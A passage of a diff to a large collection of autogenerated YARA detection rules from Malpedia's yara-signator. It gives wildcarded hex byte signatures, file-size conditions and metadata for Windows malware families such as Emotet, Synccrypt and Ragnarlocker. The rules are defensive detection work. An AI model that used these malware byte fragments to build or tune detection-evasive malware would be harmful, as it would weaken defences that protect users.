50 } - $sequence_4 = { 83feff 7509 57 ff15???????? 8bf0 53 } - $sequence_5 = { 895de8 2bf1 75d5 8b5df0 8b5508 51 } - $sequence_6 = { 6a00 53 ff15???????? eb06 8b7dd8 } - $sequence_7 = { 8bd6 e8???????? 8b7dfc 59 59 85c0 } - $sequence_8 = { f3aa 68???????? ff15???????? 50 } - $sequence_9 = { 8b7df4 32c0 8b4de4 f3aa } - $sequence_10 = { 50 e8???????? 83c40c 68fd000000 } - $sequence_11 = { 50 68???????? ff15???????? 85c0 7505 e8???????? } - $sequence_12 = { 50 8b4508 8b00 99 } - $sequence_13 = { c705????????01000000 c705????????02000000 8be5 5d c3 } - $sequence_14 = { 833d????????00 750a 6a32 ff15???????? } - $sequence_15 = { 6808020000 6a00 ff15???????? 50 } - $sequence_16 = { e8???????? 6a0c 6a08 ff15???????? 50 ff15???????? } - $sequence_17 = { 50 6a02 ff15???????? 6888130000 } - $sequence_18 = { e8???????? 8d45fc 50 6a01 6a01 } - $sequence_19 = { e8???????? 85c0 750c c705????????03000000 } - $sequence_20 = { 8b4508 8b00 99 52 50 6a00 } - $sequence_21 = { 68???????? 51 51 ff15???????? 50 } - $sequence_22 = { 53 53 53 8901 } - $sequence_23 = { 83faff 7508 ff15???????? 8bd0 } - $sequence_24 = { e8???????? 3935???????? 7412 83ec0c ba???????? b9???????? } - $sequence_25 = { 6a40 6a00 8bf7 57 81e60000ffff e8???????? 8b4608 } - $sequence_26 = { ff15???????? a3???????? 391d???????? 7428 85c0 } - $sequence_27 = { 8d4204 3bc8 7344 2bca 898de4fdffff 034e0c } - $sequence_28 = { ff15???????? 85c0 7510 8d4864 } - $sequence_29 = { 0f114710 0f104030 0f114f20 0f104840 0f114730 0f104050 } - $sequence_30 = { 85c0 7550 ff15???????? 8bf8 893d???????? } - $sequence_31 = { 6a1c 50 56 ff15???????? 8b4de8 } - $sequence_32 = { 0f104010 0f110f 0f104820 0f114710 } - $sequence_33 = { 0f114f50 0f104060 0f114760 8b4070 894770 be01000000 } - $sequence_34 = { 8d4864 ff15???????? ffc3 83fb0a 7cd5 } - $sequence_35 = { 0f104050 0f114f40 0f104860 0f114750 0f114f60 b801000000 } + $sequence_0 = { 8b4d0c 8b510c 83c204 52 8b45fc 50 } + $sequence_1 = { c745f800000000 c745f000000000 c745f400000000 c745ec00000000 8b4514 6bc005 c1e803 } + $sequence_2 = { 8b45dc 50 e8???????? 83c410 8945d8 837dd800 750c } + $sequence_3 = { 83ec08 894df8 8b45f8 c700???????? 8b4df8 c7810c09000000000000 8b55f8 } + $sequence_4 = { e8???????? 83c408 8b5518 52 8b45dc 83c004 } + $sequence_5 = { e8???????? 83c408 eb17 837d0803 7511 68???????? } + $sequence_6 = { 8bec 83ec08 8b4508 50 6a01 e8???????? 83c408 } + $sequence_7 = { 7423 8bce 8bc6 c1f905 83e01f 8b0c8da0d80110 } + $sequence_8 = { 51 e8???????? 83c404 8b45e0 83c00c 8be5 } + $sequence_9 = { 8955f8 8b45fc 8b4df4 8b55f8 0faf948134e30000 8b4df4 8bc2 } condition: - 7 of them and filesize <516096 + 7 of them and filesize <270336 } -rule MALPEDIA_Win_Dma_Locker_Auto : FILE +rule MALPEDIA_Win_Synccrypt_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a8f397b8-8b2b-5241-983c-0be688886121" + id = "06111ba7-b1d3-5613-b1dc-5c5b2d1d9432" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dma_locker_auto.yar#L1-L123" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.synccrypt_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "b77f5ca2d335c463d6c2790ec00b5fbc00e6cee8478dbf10e4d2132a598117f8" + logic_hash = "f349f89fd6eccd96b82f1ed169c1d5231d52d67328e2977c4a89bd9cc0fef158" score = 75 - quality = 75 + quality = 45 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -149317,32 +152056,32 @@ rule MALPEDIA_Win_Dma_Locker_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { e8???????? 8bf0 eb02 33f6 6803010000 8d8c24a1040000 } - $sequence_1 = { 57 56 e8???????? 83c40c 84db } - $sequence_2 = { 8bc7 e8???????? 84c0 741f 8b4f10 8b13 57 } - $sequence_3 = { 8a5dfd 32ca 8a55fc 32cb 8848ff 8aca } - $sequence_4 = { 8b5e04 8b0e 8945ec 8b55ec } - $sequence_5 = { ffd7 85c0 7fe3 5f } - $sequence_6 = { e8???????? 8b442420 8b00 83c40c 8d4c2424 51 } - $sequence_7 = { 52 ff15???????? a1???????? 6a00 50 ff15???????? e9???????? } - $sequence_8 = { 7545 68???????? e8???????? 8b95b0f6ffff 83c404 52 ff15???????? } - $sequence_9 = { 385e14 0f85e8000000 8b4618 83f8ff 7407 50 ff15???????? } + $sequence_0 = { c744240477000000 c7042422000000 e8???????? e9???????? c7442410af000000 c744240c94195900 c74424087a000000 } + $sequence_1 = { ba01000000 89f8 e8???????? 85c0 8b4c242c 0f84aa000000 8b4714 } + $sequence_2 = { 892c24 e8???????? 892c24 89c7 e8???????? 85c0 7517 } + $sequence_3 = { c1e806 85c0 7523 897358 83c318 89742408 891c24 } + $sequence_4 = { e8???????? 85c0 74c8 8d442414 8974240c 895c2408 89442404 } + $sequence_5 = { e8???????? 85c0 0f8413010000 8d7804 89c1 c7406800000000 89c3 } + $sequence_6 = { f6400c01 7451 891c24 e8???????? 83c001 c744240897010000 c7442404???????? } + $sequence_7 = { c7442404???????? c7042402000000 a3???????? e8???????? c7442404???????? c704240b000000 a3???????? } + $sequence_8 = { e8???????? 893424 e8???????? 8b442430 890424 e8???????? 39c7 } + $sequence_9 = { 890424 8954240c e8???????? 3b6c2418 8d45fe 746e 8b570c } condition: - 7 of them and filesize <532480 + 7 of them and filesize <4489216 } -rule MALPEDIA_Win_Tapaoux_Auto : FILE +rule MALPEDIA_Win_Vflooder_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "68d778fd-5462-5b8a-898a-2fe57f5f9d68" + id = "9887b2d4-11f9-501f-8a80-a11d525400b9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.tapaoux_auto.yar#L1-L125" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.vflooder_auto.yar#L1-L106" license_url = "N/A" - logic_hash = "f82a0c342c816d1880cfb31489fc94204aa3933a5341062512dc21730819514f" + logic_hash = "c395df9bf0cea55ef8201fced5f6d58ff4786707da9a8f0c23e3a94a9aa3418e" score = 75 quality = 75 tags = "FILE" @@ -149356,34 +152095,34 @@ rule MALPEDIA_Win_Tapaoux_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c404 8d9424d0020000 33f6 52 55 ffd3 85c0 } - $sequence_1 = { f7d1 49 8d7c2454 894c2418 83c9ff f2ae f7d1 } - $sequence_2 = { 52 50 8d4c2420 68???????? 51 eb49 b900010000 } - $sequence_3 = { 68???????? 52 ffd6 8d44245c 68???????? 50 } - $sequence_4 = { 8be8 83fdff 0f84b0000000 8b3d???????? } - $sequence_5 = { 83c404 8d4c2414 50 51 e8???????? 8d54241c } - $sequence_6 = { 8d442408 55 50 8d8c241c040000 6800040000 51 56 } - $sequence_7 = { c3 8d442408 8d4c240c 50 53 53 } - $sequence_8 = { 68???????? 50 e8???????? 8b07 83c418 85c0 7526 } - $sequence_9 = { aa 8bb424200c0000 b900010000 33c0 } + $sequence_0 = { 60 ff35???????? 8f442438 9c } + $sequence_1 = { 3b45f0 60 9c 8d642424 } + $sequence_2 = { 9c 60 9c 9c 8d642430 } + $sequence_3 = { 9c ff742404 8d642434 e9???????? } + $sequence_4 = { e9???????? ff742408 8f4500 60 } + $sequence_5 = { 0000 43 7265 61 7465 } + $sequence_6 = { f5 83ef04 f5 ff37 } + $sequence_7 = { e8???????? 0000 43 7265 } + $sequence_8 = { b02e f5 f2ae e8???????? } + $sequence_9 = { 9c f2ae 9c 9c } condition: - 7 of them and filesize <294912 + 7 of them and filesize <860160 } -rule MALPEDIA_Win_Udpos_Auto : FILE +rule MALPEDIA_Win_Emotet_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "49a8c6d9-3919-52d8-b9a1-bc6d433f2d9f" + id = "66e086d2-a552-5582-bb27-ef248a857482" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.udpos_auto.yar#L1-L127" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.emotet_auto.yar#L1-L609" license_url = "N/A" - logic_hash = "ffccd56d9879c5a40153befe0b99e30b88fecb63ad13af5b9ec71c40ee069e0c" + logic_hash = "0a0e9e76b9d5a85025f54433e276f35bcb5e942e8559eb03880f6fd71aab7315" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -149395,34 +152134,97 @@ rule MALPEDIA_Win_Udpos_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8bc8 23cf 0bf1 8b4dfc 03d6 0353fc 8bf0 } - $sequence_1 = { 8b4dfc 83c404 5f 8bc3 33cd } - $sequence_2 = { 52 e8???????? 83c418 833d????????00 0f8596000000 8d85ccf3ffff 50 } - $sequence_3 = { 8888f8e84000 40 ebe6 ff35???????? ff15???????? 85c0 7513 } - $sequence_4 = { 7e1e 8d575c 85f6 7517 6639944dfcfdffff 7508 be01000000 } - $sequence_5 = { 51 e8???????? a1???????? 8b3d???????? 83c418 } - $sequence_6 = { 7e0d 83f809 7e08 a1???????? 8b7024 56 8d4d9c } - $sequence_7 = { e8???????? 68f4010000 6a00 8d8dc8fcffff 51 e9???????? } - $sequence_8 = { ffd6 8d953cffffff 52 8d85e0f8ffff 50 ffd6 } - $sequence_9 = { 40 3bc3 7cef 8b85a0feffff 50 e8???????? } + $sequence_0 = { 3c41 7c04 3c5a 7e03 c60158 } + $sequence_1 = { 7e13 3c61 7c04 3c7a 7e0b 3c41 7c04 } + $sequence_2 = { 3c30 7c04 3c39 7e13 3c61 } + $sequence_3 = { c60158 41 803900 75dd } + $sequence_4 = { 33c0 3903 5f 5e 0f95c0 5b 8be5 } + $sequence_5 = { 83c020 eb03 0fb7c0 69d23f000100 } + $sequence_6 = { c1e808 8d5204 c1e910 8842fd 884afe } + $sequence_7 = { 880a 8bc1 c1e808 8d5204 } + $sequence_8 = { 8d5801 f6c30f 7406 83e3f0 } + $sequence_9 = { 8b4604 8b16 8945fc 8d45f8 } + $sequence_10 = { 83c410 8b45fc 0106 294604 } + $sequence_11 = { 03878c000000 50 ff15???????? 017758 } + $sequence_12 = { 8bfa 8bf1 ff15???????? 8b17 83c40c } + $sequence_13 = { 8945fc 8d45f8 6a04 50 ff760c } + $sequence_14 = { 8b17 83c40c 8b4d0c 8bc2 0bc1 83f8ff } + $sequence_15 = { c745fc04000000 50 8d45f8 81ca00000020 50 52 51 } + $sequence_16 = { 66c1e808 4d8d4004 418840fd 418848fe } + $sequence_17 = { 418848fe 66c1e908 418848ff 4d3bd9 72cf } + $sequence_18 = { 2bca d1e9 03ca c1e906 894c2430 } + $sequence_19 = { 418bd0 d3e2 418bcb d3e0 } + $sequence_20 = { 488bd3 488bcf 488b5c2460 4883c450 } + $sequence_21 = { d3e7 83f841 7208 83f85a } + $sequence_22 = { 418808 0fb7c1 c1e910 66c1e808 } + $sequence_23 = { 49895b08 49896b10 49897318 49897b20 4156 4883ec70 } + $sequence_24 = { 48895010 4c894018 4c894820 c3 } + $sequence_25 = { c1e807 46 83f87f 77f7 } + $sequence_26 = { 84c0 75f2 eb03 c60100 } + $sequence_27 = { f7e1 b84fecc44e 2bca d1e9 } + $sequence_28 = { 8bd3 8b0f e8???????? 85c0 } + $sequence_29 = { 7423 8a01 3c30 7c04 } + $sequence_30 = { 83c104 894e04 8b00 85c0 } + $sequence_31 = { 7907 83c107 3bf7 72e8 } + $sequence_32 = { 56 57 6a1e 8d45e0 } + $sequence_33 = { 52 52 52 52 68???????? 52 } + $sequence_34 = { 83ec48 53 56 57 6a44 } + $sequence_35 = { 83f87f 760d 8d642400 c1e807 } + $sequence_36 = { 83f87f 7609 c1e807 41 83f87f 77f7 } + $sequence_37 = { 6a00 6aff 50 51 ff15???????? } + $sequence_38 = { 50 6a00 6a01 6a00 ff15???????? a3???????? } + $sequence_39 = { 6a00 ff75fc 6800040000 6a00 6a00 6a00 } + $sequence_40 = { 50 56 6800800000 6a6a } + $sequence_41 = { 53 56 8bf1 bb00c34c84 } + $sequence_42 = { 56 68400000f0 6a18 33f6 56 56 } + $sequence_43 = { 55 89e5 648b0d18000000 8b4130 83b8a400000006 } + $sequence_44 = { 8b5508 befbffffff c600e9 29d6 01ce 897001 } + $sequence_45 = { 50 51 52 01c8 01d0 } + $sequence_46 = { 8b7d08 83fe00 8945f0 894dec } + $sequence_47 = { 89d6 83c60c 8b7df4 8b4c0f0c } + $sequence_48 = { 8bec 83ec08 56 57 8bf1 33ff } + $sequence_49 = { 51 8d4df8 51 ff75f8 50 6a03 6a30 } + $sequence_50 = { 8b466c 5f 5e 5b 8be5 5d } + $sequence_51 = { 8b5d08 b8afa96e5e 56 57 00b807000000 008b45fc33d2 00b871800780 } + $sequence_52 = { 8bf1 bb00c34c84 57 33ff } + $sequence_53 = { 83ec10 53 6a00 8d45fc } + $sequence_54 = { 6a03 6a00 6a00 ff7508 53 50 } + $sequence_55 = { 8b7020 8b7840 89c3 83c33c } + $sequence_56 = { c605????????00 0fb6d8 e8???????? 0fb6c3 } + $sequence_57 = { e8???????? 84c0 7519 33c9 } + $sequence_58 = { ff15???????? 83f803 7405 83f802 751e } + $sequence_59 = { 7519 33c9 0f1f4000 0fb6840c30010000 } + $sequence_60 = { 743e 8b5c2430 85db 741d } + $sequence_61 = { 8bf8 e8???????? eb04 8b7c2430 } + $sequence_62 = { 31c9 89e2 31f6 89720c 897208 } + $sequence_63 = { 488d15e70f0000 e8???????? 84c0 0f84f1000000 48899c2480030000 } + $sequence_64 = { 84c0 7466 0f1f4000 488b9c2448040000 4885db } + $sequence_65 = { 8b4a48 894e20 83c418 5e c3 } + $sequence_66 = { 8b4c241c 0f44c8 2b5134 8b442420 890424 89542404 894c2418 } + $sequence_67 = { 897204 8932 8b15???????? 8944247c f20f11442470 } + $sequence_68 = { 813c3850450000 0f44f5 895e34 890424 } + $sequence_69 = { e8???????? 8d0d2231d800 890424 894c2404 e8???????? 8b4c242c 894130 } + $sequence_70 = { 8bf8 85ff 7443 be???????? e8???????? } + $sequence_71 = { 8b442450 894c2414 8b4c2418 8908 } + $sequence_72 = { 8b5010 51 52 c745f48072e601 e8???????? 8bd8 85db } condition: - 7 of them and filesize <163840 + 7 of them and filesize <733184 } -rule MALPEDIA_Win_Eagerbee_Auto : FILE +rule MALPEDIA_Win_Korlia_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2c944b22-0670-5d3a-8325-748c1204ab76" + id = "d35af9df-a058-5a30-a77f-8fa81b1625c9" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eagerbee" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.eagerbee_auto.yar#L1-L131" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.korlia_auto.yar#L1-L481" license_url = "N/A" - logic_hash = "128c0a374c8b1a00f6b82c3fc65b3e7ab4f3e40ebdc9cd2ac65e4a7f259bdca2" + logic_hash = "17b5ea46685442b751a30de5596fa43f96dfb43c44e790391afede4018d6463a" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -149434,32 +152236,75 @@ rule MALPEDIA_Win_Eagerbee_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 493bc7 753b 488b05???????? ff05???????? 488bcb ff90f8000000 488d1560d80100 } - $sequence_1 = { 488d15b7aa0100 41b908000000 48c7c101000080 498943d8 c744245810000000 ff15???????? 85c0 } - $sequence_2 = { 0f44d8 eb0b 8b7c245c e8???????? 8bd8 85db 7415 } - $sequence_3 = { 744c 488d15be810200 488bcb 4d8bc7 e8???????? 488b05???????? } - $sequence_4 = { 8b01 eb06 ff90c0000000 410fb7cc eb3b 488bcf } - $sequence_5 = { 85c0 751e 4c8b4c2448 4c8b442440 488d1517640100 488b4c2430 ff15???????? } - $sequence_6 = { 8d6f07 458d77c7 8d5fce 488d8c2470010000 664489bc2470010000 6689bc2472010000 } - $sequence_7 = { c68424c20000006f c68424c300000073 4088bc24c4000000 c68424c500000073 c68424c60000006f c68424c700000063 4488bc24c8000000 } - $sequence_8 = { 8bd8 ebbf ff90e0000000 8bd8 85db 0f8481020000 3bdf } - $sequence_9 = { 4533c9 4533c0 48896c2458 4489642450 4489742454 48898698080000 c7869408000004000000 } + $sequence_0 = { 52 68???????? 51 ffd6 } + $sequence_1 = { 6a32 50 ff15???????? 85c0 7521 } + $sequence_2 = { 33c0 f2ae f7d1 49 83f90f 7604 } + $sequence_3 = { f7ef c1fa14 8bc2 c1e81f 03d0 52 } + $sequence_4 = { 8965e8 c645e401 c745fc00000000 52 } + $sequence_5 = { 59 5a c745fcffffffff 8a45e4 8b4df0 64890d00000000 5f } + $sequence_6 = { 81fb68584d56 0f9445e4 5b 59 5a c745fcffffffff } + $sequence_7 = { 7410 6a28 68???????? 6aff 53 6a00 } + $sequence_8 = { 6a00 ffd6 68???????? c705????????1c010000 ff15???????? } + $sequence_9 = { 6a01 53 53 53 51 ff15???????? 85c0 } + $sequence_10 = { 8b442404 56 6a00 6a00 6a01 6a00 } + $sequence_11 = { 6a01 6a00 6a00 6800000040 50 ff15???????? 8bf0 } + $sequence_12 = { e8???????? 8a4c2404 6a01 884814 8b4c240c 898840200000 } + $sequence_13 = { 8b4c240c 898840200000 58 c20800 e9???????? 6800060000 } + $sequence_14 = { 8bf0 83feff 7423 8b542410 8b44240c 8d4c2408 } + $sequence_15 = { 59 59 c3 8b65e8 ff7588 ff15???????? 833d????????ff } + $sequence_16 = { 50 56 ff15???????? 56 ff15???????? b001 5e } + $sequence_17 = { ff15???????? 833d????????ff 750c ff742404 ff15???????? } + $sequence_18 = { ff742410 ff742410 ff742410 e8???????? c21000 e8???????? 8a4c2404 } + $sequence_19 = { 6a00 680030c800 6a00 6a00 } + $sequence_20 = { b8447c0000 e8???????? 53 56 } + $sequence_21 = { 8d442444 894d00 8b542438 83c504 50 895500 } + $sequence_22 = { 6880000000 6800000400 8bce e8???????? } + $sequence_23 = { 8bf9 81e7ff000000 03f2 03f7 } + $sequence_24 = { ffd6 8d44240c 6804010000 50 } + $sequence_25 = { 83c504 50 895500 83c504 e8???????? d1e0 } + $sequence_26 = { 6a00 6a00 50 8bce e8???????? 6a00 } + $sequence_27 = { 51 ff15???????? a1???????? b981000000 } + $sequence_28 = { 750c ff15???????? 53 e9???????? } + $sequence_29 = { 0f8599000000 53 56 57 b940000000 } + $sequence_30 = { ffd6 eb06 8b35???????? a1???????? 3bc3 7403 50 } + $sequence_31 = { 68ff0f1f00 ff15???????? 85c0 740a } + $sequence_32 = { 8d542414 6a00 52 68???????? 6a00 ff15???????? } + $sequence_33 = { 85c0 740a 56 50 ff15???????? 8bf0 } + $sequence_34 = { 33c0 8dbc245e020000 66899c245c020000 f3ab } + $sequence_35 = { 7403 50 ffd6 b912010000 33c0 } + $sequence_36 = { f3ab aa b9f9000000 33c0 } + $sequence_37 = { 56 3bc3 57 740b 8b35???????? 50 } + $sequence_38 = { 6801000080 ff15???????? 85c0 0f8599000000 53 } + $sequence_39 = { 68???????? 51 ff15???????? 8b54240c 8bf0 } + $sequence_40 = { 40 81c408010000 c3 83c8ff } + $sequence_41 = { 5e 24fe 5b 40 } + $sequence_42 = { 83c9ff 33c0 68003e0000 f2ae f7d1 2bf9 } + $sequence_43 = { 50 8b4308 6a02 57 ffd0 85c0 750c } + $sequence_44 = { a0???????? 884102 ba???????? 8bf2 8a02 42 } + $sequence_45 = { 51 8b0d???????? 8d85c4f0ffff 6a05 6a04 50 } + $sequence_46 = { 8bc7 83e03f 6bc830 8b049578c14100 f644082801 7421 57 } + $sequence_47 = { 85f6 7439 8d4dd0 68???????? 51 c745d0306e4000 } + $sequence_48 = { ff15???????? 85c0 7421 6a3f 8d85fcfeffff } + $sequence_49 = { 6a00 ff15???????? 8bf8 85ff 7503 5f 5e } + $sequence_50 = { 5d c20c00 ffb5f8efffff 8b35???????? } + $sequence_51 = { 51 e8???????? 8d942404030000 68???????? 52 } + $sequence_52 = { 50 51 e8???????? 8b742430 83c41c } condition: - 7 of them and filesize <422912 + 7 of them and filesize <263168 } -rule MALPEDIA_Win_Campoloader_Auto : FILE +rule MALPEDIA_Win_Unidentified_092_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "00b62c88-0d38-56b9-90a5-7c85290ffbe9" + id = "7e18dd30-6337-5c36-a898-b23460fa3b1e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.campoloader_auto.yar#L1-L116" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_092" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_092_auto.yar#L1-L127" license_url = "N/A" - logic_hash = "dae472a7090c99e8a9ce136356f9bc867c42c508ecb59c9f6aa0187832a15e3c" + logic_hash = "2159e4ff6c9c542892316c91029887360b4aa3e31c90494be3422bea5bef7c7b" score = 75 quality = 75 tags = "FILE" @@ -149473,34 +152318,34 @@ rule MALPEDIA_Win_Campoloader_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83ec1c a1???????? 33c5 8945fc a1???????? 8945e4 } - $sequence_1 = { 898d58efffff c78584efffff00000000 8d55f4 52 8b8558efffff 50 } - $sequence_2 = { ff15???????? ff15???????? 8b8584efffff 8b4dfc 33cd e8???????? } - $sequence_3 = { 8b9584efffff 039574efffff c60200 8b450c } - $sequence_4 = { ff15???????? 898550efffff 0fb78554efffff 50 } - $sequence_5 = { 038d8cefffff 898d74efffff e9???????? 8b9584efffff 039574efffff c60200 8b450c } - $sequence_6 = { ff15???????? 8945f8 68???????? 8b45fc 50 } - $sequence_7 = { 6a01 6a00 6a00 6800000040 8b4510 } - $sequence_8 = { 8b8558efffff 50 8d8df0feffff 51 } - $sequence_9 = { 8b8d70efffff 51 8b9584efffff 52 ff15???????? } + $sequence_0 = { c78520ffffff00000000 c68510ffffff00 83f810 7241 8b8df8feffff 40 3d00100000 } + $sequence_1 = { 723f 8b4c2464 40 3d00100000 722a f6c11f 0f850b010000 } + $sequence_2 = { 33f1 8b7df8 0375a4 8bd3 8b5dfc f7d2 8b4de8 } + $sequence_3 = { 8b41fc 3bc1 0f83de020000 2bc8 83f904 0f82d3020000 83f923 } + $sequence_4 = { 0155ec c1c107 33f1 8bcb 8bd3 } + $sequence_5 = { 56 52 50 8b08 ff511c c745fcffffffff 83ceff } + $sequence_6 = { 8d8558ffffff 50 0f118568ffffff ffd3 c645fc03 83ec10 } + $sequence_7 = { 8bc3 c1c007 8bcb 33d0 897508 f7d1 8bc3 } + $sequence_8 = { 83ee01 75e9 8b85e4fbffff 83f814 } + $sequence_9 = { 50 56 ffd3 85c0 7f38 68???????? } condition: - 7 of them and filesize <66560 + 7 of them and filesize <10202112 } -rule MALPEDIA_Win_Soraya_Auto : FILE +rule MALPEDIA_Win_Milkmaid_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "17c03046-2ad1-5623-9130-def458833386" + id = "7c60d500-9a52-5cea-8bfb-4d836c40072e" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.soraya_auto.yar#L1-L230" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.milkmaid" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.milkmaid_auto.yar#L1-L100" license_url = "N/A" - logic_hash = "43793169adfc64c624ebc876524a7869403686546a466d508c127ca9f78faaa7" + logic_hash = "c4a5987f68f519192a013c67faec02935457872f835e55aadbf7cdc1a7483580" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -149512,45 +152357,30 @@ rule MALPEDIA_Win_Soraya_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff15???????? 8d48bf 80f919 77f2 } - $sequence_1 = { e8???????? 488d151af0ffff 488d8d60020000 ff15???????? e8???????? 488d8d60020000 488bd0 } - $sequence_2 = { 57 8bd8 56 53 e8???????? 8b733c } - $sequence_3 = { 33c1 99 b99a000000 f7f9 b8fe340000 } - $sequence_4 = { 488bd0 4c8b4850 498bcb 41b86b000000 } - $sequence_5 = { 41b800300000 ff15???????? 488b8d50010000 4c8d8d48010000 488bd8 488d8540010000 488d1565f4ffff } - $sequence_6 = { 8b4c2414 33c6 33ce 03c1 } - $sequence_7 = { 418bd6 3bcb 72c8 4c891d???????? 488d0d1fe0ffff } - $sequence_8 = { 894df4 0f8501010000 53 56 8b7178 } - $sequence_9 = { 8b4a0c 8b7210 03c8 8365fc00 8b55fc ff45fc } - $sequence_10 = { 488d0dfadfffff ff15???????? 488bc8 e8???????? 488d0df5dfffff ff15???????? 488d15f8dfffff } - $sequence_11 = { 689b558d52 6853d56c36 68ff555535 68f9d6feff 6888888868 } - $sequence_12 = { 8b45ec 2bf8 037d10 8b45e8 } - $sequence_13 = { 2bd0 894de0 3bd1 7649 8b55f8 33d6 } - $sequence_14 = { 03570c 034f0c 807df800 8a540203 8a4c0102 8855fb } - $sequence_15 = { 8b3d???????? 6a1c 8d45e0 50 6a00 } - $sequence_16 = { 7444 53 4883ec30 488bd9 b910270000 ff15???????? 8364242800 } - $sequence_17 = { 488d0d73f8ffff 498bd8 488bfa ff15???????? } - $sequence_18 = { 56 57 8d85fcfdffff 6800020000 50 e8???????? } - $sequence_19 = { ff45dc 295de0 4e 75e8 b844060000 0345c8 } - $sequence_20 = { 7424 56 6a00 683a040000 ff15???????? 8bf0 85f6 } - $sequence_21 = { 8dbc07fe3ef2ff 8b45d8 33c6 3bbc05be3ef2ff 0f82bdfdffff } - $sequence_22 = { 8b45fc 8b4dec 8b4508 8b9578ffffff 8b80d8010000 33d3 } + $sequence_0 = { 7440 56 ff15???????? 8d4c2414 } + $sequence_1 = { c68424dc28010002 e8???????? 8d4c2410 c68424dc28010001 } + $sequence_2 = { 50 53 ff15???????? 8d4c2478 c68424dc28010002 } + $sequence_3 = { 6a00 ff15???????? 6aff 8d4c2408 e8???????? 68???????? 8d4c2408 } + $sequence_4 = { 895c2428 7513 8b5508 52 53 } + $sequence_5 = { 8d442408 57 50 e8???????? 83c404 33db } + $sequence_6 = { 8be9 896c2420 8a8528280100 84c0 7528 8b4d04 } + $sequence_7 = { 51 8d8c2480000000 c68424e428010003 e8???????? b911000000 } condition: - 7 of them and filesize <188416 + 7 of them and filesize <65536 } -rule MALPEDIA_Win_Sedll_Auto : FILE +rule MALPEDIA_Win_Ragnarlocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "009a21d7-9a67-5650-8e55-9cfcfc21e0f2" + id = "e474a54c-f0e2-58cf-8fb5-f5efe389dd86" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sedll_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ragnarlocker_auto.yar#L1-L131" license_url = "N/A" - logic_hash = "21c4f01124bd0cd6ba61129966ab2fcf5cc6cd643797282b60948edf1b57805e" + logic_hash = 